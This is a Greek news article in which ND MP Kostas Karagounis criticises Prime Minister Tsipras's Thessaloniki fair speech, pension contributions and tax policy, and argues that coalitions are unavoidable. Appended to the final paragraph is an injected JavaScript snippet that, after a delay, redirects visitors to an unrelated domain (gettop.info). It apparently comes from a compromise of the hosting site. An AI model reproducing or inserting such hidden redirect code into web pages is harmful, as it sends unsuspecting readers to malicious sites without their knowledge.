Καραγκούνης: Οι συνεργασίες είναι μονόδρομος ακόμη και με αυτοδυναμία

0
5

 

Την ομιλία του πρωθυπουργού στη ΔΕΘ σχολίασε μιλώντας στον ραδιοφωνικό σταθμό «Ράδιο 1» της Θεσσαλονίκης, ο Κώστας Καραγκούνης, βουλευτής της ΝΔ, εκτιμώντας ότι η ακολουθoύμενη πολιτική χειροτερεύει την οικονομία της χώρας.

«Εκτός από την αναφορά του σε κάποιους διορισμούς, ο κ. Τσίπρας δεν αναφέρθηκε στο προσωπικό του σχέδιο για την έξοδο της χώρας από το μνημόνιο. Η Νέα Δημοκρατία προτείνει ένα άλλο μείγμα πολιτικής, μια εντελώς διαφορετική φιλοσοφία με άμεση μείωση φορολογικών συντελεστών» υπογράμμισε ο Κώστας Καραγκούνης.

Επιπλέον, ανέφερε ότι ο πρόεδρος της ΝΔ θα παρουσιάσει στη ΔΕΘ τη στρατηγική του κόμματος, χωρίς μεγάλα λόγια και υποσχέσεις. Ακόμη υπενθύμισε ότι το κόμμα του το 2012 που παρέλαβε μια πολύ δύσκολη κατάσταση, κατάφερε να υλοποιήσει αυτά που υποσχέθηκε – όπως τη μείωση του ελλείμματος και του φορολογικού συντελεστή στην εστίαση- χωρίς να αυξήσει τους υπόλοιπους φόρους.

Ο Κώστας Καραγκούνης υποστήριξε πως όταν τριπλασιάζεις τις εισφορές στον ΟΓΑ και στον ΟΑΕΕ, κανείς δεν θα μπορεί να πληρώνει και το 2017 τα ελλείμματα στα ταμεία θα είναι πια τεράστια. Συμπλήρωσε δε, ότι εάν δεν εξοικονομηθούν τα χρήματα για τις συντάξεις, υπάρχει περίπτωση είτε να ενεργοποιηθεί ο «κόφτης», είτε θα γίνουν άλλες περικοπές.

Ο βουλευτής της ΝΔ δεν απέκλεισε αυτή να είναι μια χρονιά πολιτικών εξελίξεων, σημειώνοντας ότι το πρόβλημα δεν είναι κομματικό, άλλα εθνικό, για την ανασυγκρότηση και την επανεκκίνηση της οικονομίας. «Ο κόσμος θέλει προκοπή, χρειάζεται εθνική προσπάθεια και όχι διαχωριστικές γραμμές» υπογράμμισε ο Κώστας Καραγκούνης και πρόσθεσε πως και σε περίπτωση αυτοδυναμίας της ΝΔ, οι συνεργασίες είναι μονόδρομος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here